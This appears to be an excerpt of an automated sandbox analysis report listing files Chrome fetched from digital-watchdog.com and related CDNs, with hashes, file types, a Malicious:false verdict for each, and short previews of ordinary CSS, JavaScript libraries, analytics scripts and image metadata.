                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                    Preview:............{W..7.?..xw..F..(m..,J)..h...(K..K.I.K....~.7.l9.}.~.s.j...ei4....o.................l......No8......@.n..G..`X\zp.....w.Xu.j. Q.Q..V.....[ju.XZz...[..t.Q.=.L.....0}..Qp'CY..;.......q..z..}.O&...F.../.G.}.k<...F.....M&......A....xN...Q....'xc....AP.l.d..N...0.jq.....]...G...7.a..[CQ.......U.i.~.t..p ".%.T......B.DuY....:P... ..}......y..r....7o.?<......../_.}...@.3..]....*?(x......'O..^x.kY......]]J.#./i..1./..I6V=.+zS..........W..v..;....Wu.....~6<....G..#5..WA0j.z.....z.w.....4.......v..@...E.Z..:5.^N..`2......O&4.....f.U...Z.D.~K.h...f .......n.....W.......4.bc..a.......I..sj...........\Y.,MZ........nmoo....O.A.L........N..';.....a..L.........n..pg0......E,g..}.\Y...A6.9..i.Q...j.o`g..S.g.....u. *.....a........4.#t6.;.O..#4.....";...........p.?C9...-...........i.?..k?.Z...F...6....7i..AeR.QY........<...v......=...J..[v....T...\.B..K..^.#.!.......G.s..W.....nq.{.C......Ws}7.nq4..G*9...++...n_...G
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):150023
                                                                                                                                                                                    Entropy (8bit):4.824734913563173
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:330F10FE40745D560F763D4BE75E8D04
                                                                                                                                                                                    SHA1:971ECB5F7D536E38BDCB3E7FA6368DEC2097A2CC
                                                                                                                                                                                    SHA-256:D948D4DBCFF6084A20CF75561C6B72FBB7F4D16BC51B0D97D6EC7F58499002C6
                                                                                                                                                                                    SHA-512:5611AB2317ABB3984188AC097E69A8A4A966145F06D3085A832202D45EEC696490F83B12462B0EBEC8972BC4B0CD01ABEDCDFD115604BF47B74866BA0066D6FC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/css/framework.css
                                                                                                                                                                                    Preview:/* Change bootstrap's .container default width */....@media (min-width: 768px) {.. .container {.. max-width: 750px;.. }..}....@media (min-width: 992px) {.. .container {.. max-width: 970px;.. }..}....@media (min-width: 1200px) {.. .container {.. max-width: 1170px;.. }..}....@media (min-width: 1400px) {.. .container {.. max-width: 1320px;.. }..}....../* Font styles */.....underline {.. text-decoration: underline;..}.....thin {.. font-weight: 100;..}.....extralight {.. font-weight: 200;..}.....light {.. font-weight: 300;..}.....regular {.. font-weight: 400;..}.....medium {.. font-weight: 500;..}.....semibold {.. font-weight: 600;..}.....bold {.. font-weight: 700;..}.....extrabold {.. font-weight: 800;..}.....heavy {.. font-weight: 900;..}.....sp-10 {.. letter-spacing: 1px;..}.....sp-15 {.. letter-spacing: 1.5px;..}.....sp-20 {.. letter-spacing: 2px;..}.....sp-25 {.. letter-spacing: 2.5px;..}.....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, from Unix, original size modulo 2^32 6359
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2282
                                                                                                                                                                                    Entropy (8bit):7.907521605008239
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:116EDC1C103AE969EE4C445394493CD2
                                                                                                                                                                                    SHA1:6958A9284B3ED12C6DA9EEAA0D3F2D8170101EF8
                                                                                                                                                                                    SHA-256:6287EF6F71546BCC94EDAFFE44A656B6913F631B3F435E9795F28C349618E65C
                                                                                                                                                                                    SHA-512:A16E89F292762C9C9EE1651BE6E4642C5B88488470F75C3E1519379B763F57DDEF565C56385FB7B9E2BFCCF9F123BFE389C4D2F11CEE22F379EBC95866496BFF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://kanshuwang.top/ls/tracker.js
                                                                                                                                                                                    Preview:...........XmW.:..+....H.%.d........J[.={l.$.!......}GR.."....".fF.F3.1..b...z ...n...(......z.......$3"1.J&.Z......|.......Km.)W8y=I..<.W..b....y[..Uw._...m..+j..:}..?.6.8....Uw.......2.lm...h.....k]...H.Y..1[.Dh...4.d.b....H.....T.d..l*.....E..~grW.;..J9.U.$..=..C..."Q....OOF-..&...(.6.x......u../..T..!',..#.rM....%..?Cx..L.I+q. $N..^.e...+..=X.-..c...X.Z...:v..5.t...l...j6^.z5...l..y..dy.m......k`.<..9o5..... .......`...t.. 4.@.....W.7..(..5...BM.........7...U......Wp[:...39...c9.M0.$r...n...).+.:....8)....q./'.r.....+.......QZV.y...C........U.'....5N..zy.......f...S.a..6.F.G(N......r..........:..K....#y.g.Y!.......?.{$.j...Q..{.|.........3M......f(?..2..J.....V...l....Y!..O.......#.b..}..J..t.l.f.z.p@..G?.."W.o/.z...O..7.q.].....q$.]...G.?..O..WL"...........G.......|.S........y.........../>_~...*..j0..\.n...vZVw......AH(.b00..a%u>xY^....\M..i.,.......=}|.k.mv.......> v~=.=;.^...1.].aC...r..m!Fq.G.............f.(.(..!..:
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (14965), with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):14967
                                                                                                                                                                                    Entropy (8bit):4.772171120866488
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:BA5948C0BDA0F5F26BD3068CE565DEAA
                                                                                                                                                                                    SHA1:6D28595693CE13F1A79DB7D5C73BD82B13CF63B5
                                                                                                                                                                                    SHA-256:C2A282DD6DAC10A3FBF469B4E67F489608777854E6D157BF11233DFBAA16851E
                                                                                                                                                                                    SHA-512:B697887282E03A0838BC8FBA10B5F85144DCF14727A01703EA6BBF047B30860C58AEF75BCFC9FE76AE5F291BE60369AD22CF39C98D7A1D8AC90B4CA68B2776A6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/library/select2/css/select2.min.css
                                                                                                                                                                                    Preview:.select2-container{box-sizing:border-box;display:inline-block;margin:0;position:relative;vertical-align:middle}.select2-container .select2-selection--single{box-sizing:border-box;cursor:pointer;display:block;height:28px;user-select:none;-webkit-user-select:none}.select2-container .select2-selection--single .select2-selection__rendered{display:block;padding-left:8px;padding-right:20px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.select2-container .select2-selection--single .select2-selection__clear{position:relative}.select2-container[dir="rtl"] .select2-selection--single .select2-selection__rendered{padding-right:8px;padding-left:20px}.select2-container .select2-selection--multiple{box-sizing:border-box;cursor:pointer;display:block;min-height:32px;user-select:none;-webkit-user-select:none}.select2-container .select2-selection--multiple .select2-selection__rendered{display:inline-block;overflow:hidden;padding-left:8px;text-overflow:ellipsis;white-space:nowrap}.select2-cont
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 1500 x 1500, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):174393
                                                                                                                                                                                    Entropy (8bit):7.871081493173991
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:0F2CE9312617C9BED38B56C9BE5BFFE5
                                                                                                                                                                                    SHA1:AB30FE931456ED5C4D1F7520AF88A12EF4C83E99
                                                                                                                                                                                    SHA-256:D90BD53065A2463CA1A3673740D549C3D994A390CF7626BBB3AD54D6D84332A8
                                                                                                                                                                                    SHA-512:03873964A780C9C668BD6D8F6B2CAF464586A6A0B8D9FD37C2D3F7CA50D57C8348D09F243C36E6CEA7C8E4850E634A74376D31B2DFD1296AAB363396470CE410
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:.PNG........IHDR.............85Ld....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:OriginalDocumentID="uuid:65E6390686CF11DBA6E2D887CEACB407" xmpMM:DocumentID="xmp.did:52E144F1DC4411EC81E2E25D796AC982" xmpMM:InstanceID="xmp.iid:52E144F0DC4411EC81E2E25D796AC982" xmp:CreatorTool="Adobe Illustrator CC 23.0 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:35d29fac-7e86-e04b-b9a7-58f1a7b4d24b" stRef:documentID="xmp.did:35d29fac-7e86-e04b-b9a7-58f1a7b4d24b"/> <dc:title> <rdf:Alt> <rdf:li xml:lang="x-default">Web</rdf:
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):6698
                                                                                                                                                                                    Entropy (8bit):4.774255866140683
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:571ECD83095B3228BBA655EFB7A04B94
                                                                                                                                                                                    SHA1:C90696E3792D8FF36B53BA97A8B4941032C14FE6
                                                                                                                                                                                    SHA-256:8A48B558139B192DD8507B7E439DB4EFC10EF5A86175ACDBD2449B7CDFF2D2A7
                                                                                                                                                                                    SHA-512:DA2DC1A03ED8BCC95A62A7B438535C967E23154E1AD622FB993BD305B45BD481C0CBBA7C7751DAA91B563580BB28252C1C674CD8ABAC3187E4975DDFF39639C5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/js/custom-script.js?20250530073516
                                                                                                                                                                                    Preview:$(function() {.. 'use strict';.... $('.datepicker').datepicker();.... if ($('.banner-01').length) {.. $('.banner-01').each(function() {.. let self = $(this);.. self.find('.slides').slick({.. infinite: true,.. slidesToShow: 1,.. slidesToScroll: 1,.. arrows: false,.. dots: true,.. appendDots: self.find('.dots'),.. autoplay: true,.. autoplaySpeed: 6000,.. speed: 800,.. pauseOnFocus: false,.. pauseOnHover: false.. });.. });.. }....});......$(document).ready(function(e) {.. // Phone validation.. $('input[type="tel"]').usPhoneFormat({.. format: '(xxx) xxx-xxxx',.. });.... $('.validation_form').on('keyup keypress', function(e) {.. var keyCode = e.keyCode || e.which;.. if (keyCode === 13) {.. e.preventDefault();.. retur
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1836
                                                                                                                                                                                    Entropy (8bit):4.696338008769207
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:81279E22C8ECE9E1D0536A402484DAA3
                                                                                                                                                                                    SHA1:911797507FB12D4F451D5900E32DB96AD697C401
                                                                                                                                                                                    SHA-256:5C6237178E88AB7F1C6E26C9E99547E58782450B8F2A182129448FF4D99E89AB
                                                                                                                                                                                    SHA-512:4B510D6CE8A76B4FB3CFF4019AE56DE39E22B2F53B13BA5DD27BEFC0251B468FFB6D7547CAC66654F8FAA7F2413D0E2A1667C5A11BD36FCD312731D0C0C0BE6C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/library/Cookie-Alert/cookiealert.js
                                                                                                                                                                                    Preview:/*.. * Bootstrap Cookie Alert by Wruczek.. * https://github.com/Wruczek/Bootstrap-Cookie-Alert.. * Released under MIT license.. */..(function () {.. "use strict";.... var cookieAlert = document.querySelector(".cookiealert");.. var acceptCookies = document.querySelector(".acceptcookies");.... if (!cookieAlert) {.. return;.. }.... cookieAlert.offsetHeight; // Force browser to trigger reflow (https://stackoverflow.com/a/39451131).... // Show the alert if we cant find the "acceptCookies" cookie.. if (!getCookie("acceptCookies")) {.. cookieAlert.classList.add("show");.. }.... // When clicking on the agree button, create a 1 year.. // cookie to remember user's choice and close the banner.. acceptCookies.addEventListener("click", function () {.. setCookie("acceptCookies", true, 365);.. cookieAlert.classList.remove("show");.... // dispatch the accept event.. window.dispatchEvent(new Event("cookieAlertAccept")).. })
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 22.0 (Windows), datetime=2022:07:06 19:09:54], baseline, precision 8, 883x676, components 3
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):209344
                                                                                                                                                                                    Entropy (8bit):7.565530064515262
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:F50A645971E7B6A24C970C0FA0FF17A2
                                                                                                                                                                                    SHA1:2D5DFC0F1A19EA96E05D1ED546AFCFE54E9A5482
                                                                                                                                                                                    SHA-256:C3C4596A7402881D24DB093EFB9EC95A3DE3CDB8A66A0F55C168BD16E2AA96B8
                                                                                                                                                                                    SHA-512:2C52839D3EDC258CA2CA8F82972082D8B1E5DC93D0F4D9083E8EBA3582F7DD3F7874518D309CAAEB99DCED543ABD4A597360C8BA10E2563B661C731E05102A42
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://dmq883log67hn.cloudfront.net/assets/_medialibrary/Recording_01.jpg
                                                                                                                                                                                    Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 22.0 (Windows).2022:07:06 19:09:54.............................s..........................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....j..N..N.:J]$...$.t...N...I$.'I$...N...I$....RL.1r..'IK.L.%..d.t.I%..d.)t.'IK..$..u..)t.%)).....yL\.:.....S.<j....X..M...9.F7..i..l..WW...o.?..\nO
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):590
                                                                                                                                                                                    Entropy (8bit):7.627728338030957
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:4DC2FAB77C99E74FDE683CC1CC3E70AB
                                                                                                                                                                                    SHA1:A211E32F4D89285E25EE749DE4E5691A2C2F7E14
                                                                                                                                                                                    SHA-256:92B0D8F3A81FF0A1DC7C1FF519F80D1DA7C1225F4C3CBD08DCD4A05639D38475
                                                                                                                                                                                    SHA-512:8A735673948DB8878E7D2935667D08FE8BD0A679CDEC446B5A7D260196A8095715CAB76CD6F3A5C5365C3E29AA8AD539D29F010397FC90FE0B93E10150D8AC5B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css
                                                                                                                                                                                    Preview:.x7....{.,.....{T..L...&1`al..U..&......5.-82....%.K.... |.(.d...8...})4.D.......vi..^......9||...\....I....a..M.8...hL.S..!.,0..m...;.X...y#.=.n.w.6.|v..I.F.5..z. ..r..y.Q..NJ.h.Y.\Q.....5v.h..X;.;P..!.......y.e.^....@8j?.IcL.D..{<..|...X.5R...}a-0x....7...;Rf.g...3...Qv.~6.ea]^?..y..X.|4x+j+....v..X..].Bw..}6..wN0.W.>\a....=.5-#...laA.`. .C.A.V.Ym....1.P......>.a.....;.=.D.9]...qw...I...j..Q.r..4.;U...d..l.ac]....n.yb.x*.$,x.......0J..LW*..s..}2.l...1.w...._<....035R.Bn+..%'Pcp.oU.-....N....{..i..o.r0....T-S..-../.8..<...:..V$....q2....wM..Gw.c.@..9..4.w.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2498
                                                                                                                                                                                    Entropy (8bit):7.920577092924342
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:D9694B3FA1F912D953E3965A0A5BDFBF
                                                                                                                                                                                    SHA1:6C190C2B95D55CAD7091004726C23CF0EB78AB9E
                                                                                                                                                                                    SHA-256:2E683FBBC49F0E3BFFCF5B19AA0E98A3DAF693A33EA19818BF0E150144804CD5
                                                                                                                                                                                    SHA-512:974D55712C749E5694FA22CC278DD1E5D60C34E3FAAF236CA14D41AB6D7D565413C17E055ACD894B5D20FFCC8B90719C72179F8F194E1F4F3DD73D6115CA921E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://bat.bing.com/p/action/187184346.js
                                                                                                                                                                                    Preview:.r........\.....CC.Z...{TVV.[Y.DDy.xWfDT.{..DF............{FG......wkUw....'N$..D#...V.F...k.}<...B.........A..ST..}..p4...].w..m.......wv-?.?N.J....../..;.L...j...fy..kNJ...f=.yZ...R<.T.u.tm...e0G...Ig.t.b.R....&.5..w.Jo..JO.....G<x..'x....cl;.U...#...T#.p&.n..O....I.....].@h..p..H.9...3....o@.........u&.=..Q]..WQ.Y..*.oN...L..'.I...&..X.*1{t....l..J..Z...E2=..5.....Ng.N..H0..0.3.5..#.....h.)......I2%.?.VQQwRp.....jp........[.K..w.Q.g.L3r.f(.$#+.)..".....&.UHO.*.}.,=..x71Zg..&.M....n.3cF.G.[.@<..#....Nf.%....-.C.a.."..<.....M....H.=De.m%Q..w.....G..\..{. ...|..|#..|...NF.Z(....E~|......~O.`...1p...`..Z....{.......W|YVX..z.............h....[....F(A\.z;S..J....+....y.(...*..@ub...\9..B.U...&...{..(.k.......J?....6.....E..8.n).`.....:.C..x..i..6K..y..N.S,.Zvl.....u,.?.53,x2G.K.T.".....P..S.Y...}W..t....3/P.8.co..QC.k.H>v....dz.0..<....kNr>Cf....{A..{...9...c.q\~.d..v!We.`..W'.A.k.kN>..5\@..r.ahy.*>...w;.*....[..Y..~........pQT.'....b9..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 73x73, components 3
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):5956
                                                                                                                                                                                    Entropy (8bit):7.800586311179616
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:AB78DDA4757AFFEC03524590C5711870
                                                                                                                                                                                    SHA1:FE1AF838543B9B80A9A20357DAF347385B503D8D
                                                                                                                                                                                    SHA-256:9B2AFCD8C1A577C5500731956291F02F4BD43ADE34CD827C700351380F650359
                                                                                                                                                                                    SHA-512:8E58B6DF130B437D7FFB0409AD94ED24A7F937CD4FA09680C415B15591CA28BFF21D08CF3759B35999C41E51068247450DABAA0E2D15EDBDB7D7C5434E55BEC6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/product_detail_assets/top_nav_icon5.jpg
                                                                                                                                                                                    Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:OriginalDocumentID="uuid:9E3E5C9A8C81DB118734DB58FDDE4BA7" xmpMM:DocumentID="xmp.did:7365E32A477211ECB8BDB3060B8AFEEC" xmpMM:InstanceID="xmp.iid:7365E329477211ECB8BDB3060B8AFEEC" xmp:CreatorTool="Adobe Illustrator 24.3 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0e7e163f-387d-5640-8525-967c941de0a4" stRef:documentID="adobe:docid:photoshop:4426e061-dcdc-aa44-9118-671f329bebaa"/> <dc:title> <rdf:Alt> <rdf:li xml:lang="x-default">DW_HomePage_JC</r
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 22.0 (Windows), datetime=2022:07:06 19:14:25], baseline, precision 8, 883x676, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):178913
                                                                                                                                                                                    Entropy (8bit):7.42386309016671
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:DC8D823C5F4AA885A0F396509E026DC5
                                                                                                                                                                                    SHA1:FCFCC3DDFD8986830D5AABAEDC88FB74A1341A8A
                                                                                                                                                                                    SHA-256:919F4F2B606D959F6576B4E13E7764CCEDEE25ACBFB57CB6C30D789CFD678AFC
                                                                                                                                                                                    SHA-512:6B23501A9A7DA130150A37C7D2BF5D969B3CED0D993A2D279CDD94A4C1F3901DD70E0B05DA485DF4D7A623CE4F7B1DDA33AAF306D3FDDA67798D2C1612F22581
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 22.0 (Windows).2022:07:06 19:14:25.............................s..........................................."...........*.(.....................2...........H.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..RI$..L.%):d.)I.'IJN.:JRt..R.I$..I$..I$.R.$.I....RL.5r.$.J]$.IK..I)t.'IK..:J]$..R..I%..2I)t.Jt.......M)Jj.I&.....$.JKU&.I.x.0...cp2..!I..... ....(_j..]..HI
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4918), with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4954
                                                                                                                                                                                    Entropy (8bit):5.198165586236478
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:1E12D06AC1B0C32EF3FED341EFE88208
                                                                                                                                                                                    SHA1:13F61BEB9CAC6E2011ACE3D0B765B619D007881C
                                                                                                                                                                                    SHA-256:6F21BD9FEC01461E94A9A65DF901CA4309213DDF3E5AB8659C198C37749EA889
                                                                                                                                                                                    SHA-512:F3531C4F517BCCDEE7F075156ED847AB22F223A8E674DB0EFDD2437C8A5899A2AE2BA7244C85E8F7CD647194A2C50104EB26A3827A75A370CE4322E2828F23B1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/library/jquery-toast/dist/toastr.min.js?20250530073516
                                                                                                                                                                                    Preview:!function(e){e(["jquery"],function(e){return function(){function t(e,t,n){return g({type:O.error,iconClass:m().iconClasses.error,message:e,optionsOverride:n,title:t})}function n(t,n){return t||(t=m()),v=e("#"+t.containerId),v.length?v:(n&&(v=u(t)),v)}function i(e,t,n){return g({type:O.info,iconClass:m().iconClasses.info,message:e,optionsOverride:n,title:t})}function o(e){w=e}function s(e,t,n){return g({type:O.success,iconClass:m().iconClasses.success,message:e,optionsOverride:n,title:t})}function a(e,t,n){return g({type:O.warning,iconClass:m().iconClasses.warning,message:e,optionsOverride:n,title:t})}function r(e,t){var i=m();v||n(i),l(e,i,t)||d(i)}function c(t){var i=m();return v||n(i),t&&0===e(":focus",t).length?void h(t):void(v.children().length&&v.remove())}function d(t){for(var n=v.children(),i=n.length-1;i>=0;i--)l(e(n[i]),t)}function l(t,n,i){var o=i&&i.force?i.force:!1;return t&&(o||0===e(":focus",t).length)?(t[n.hideMethod]({duration:n.hideDuration,easing:n.hideEasing,complete
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=676, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=883], baseline, precision 8, 883x676, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):345178
                                                                                                                                                                                    Entropy (8bit):7.922826578845919
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:4349AAEAD1E180CB91DA2B7B892C4FB1
                                                                                                                                                                                    SHA1:83DEBEED9D59A25CAE1521A4214D901AB9618637
                                                                                                                                                                                    SHA-256:49E296D78E65E184D289B735646541D18527B8F8221074380498CD6EF3296B2A
                                                                                                                                                                                    SHA-512:C3CA34EA22E3380B145CD6BD828826DB427AA1A8B8D54E0CBD31017E4FF82A60506CB463495E1637423596172DA837DCC8B74C85D3ADCD555DC7D5EB347F07C6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:......Exif..MM.*...............s.......................................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop 22.0 (Windows).2022:07:06 21:18:53............0231.......................s...........................................n...........v.(.....................~...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...:&.....d.kd.a\.N.....=...v.%.I.r..ep.....f4.......1.^.|T...{....e..cP......+
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 883 x 676, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):290132
                                                                                                                                                                                    Entropy (8bit):7.985069964334504
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:5EA5284A637C03EC6C2787E9819888BF
                                                                                                                                                                                    SHA1:E2AE7229D9E074377F455B05260F91FF57BC6EAC
                                                                                                                                                                                    SHA-256:2BBE11A0A49B2836C5DCE864B2D49EDC267667B3099F12CB0E885AB8CD93C088
                                                                                                                                                                                    SHA-512:3337D06F27E02633D8767050A1C3A98F0933D6BDF23E24166EC9CE59204DC6CC5B7BF06EA63977D2D599856AFD66FE55C976B6B12E832D9E32D1971E0B9CE747
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://dmq883log67hn.cloudfront.net/assets/_medialibrary/IP_Family_new.png
